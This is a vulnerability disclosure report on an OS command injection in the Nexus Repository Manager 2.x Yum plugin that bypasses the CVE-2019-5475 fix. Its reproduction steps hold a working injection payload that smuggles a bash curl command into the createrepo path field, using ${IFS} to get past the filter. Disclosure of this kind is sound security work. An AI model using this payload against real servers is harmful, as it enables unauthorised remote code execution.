OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475)

## OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) # Maven artifact **groupId:** org.sonatype.nexus.plugins **artifactId:** nexus-yum-repository-plugin **version:** 2.14.14-01 # Vulnerability ## Vulnerability Description The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability. ## Additional Details Take a look at the patch for CVE-2019-5475 https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84  The `getCleanCommand` method is not completely filtered and can still be bypassed. ## Steps To Reproduce: 1. Navigate to "Capabilities" in Nexus Repository Manager. 2. Edit or create a new Yum: Configuration capability 3. Set path of "createrepo" or "mergerepo" to an OS command (e.g. `/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo`)  ## Supporting Material/References: - Ubuntu - Sonatype Nexus Repository Manager 2.14.14-01 - Java 8 # Wrap up - I contacted the maintainer to let them know: N - I opened an issue in the related repository: N ## Impact An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system. ## Impact An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.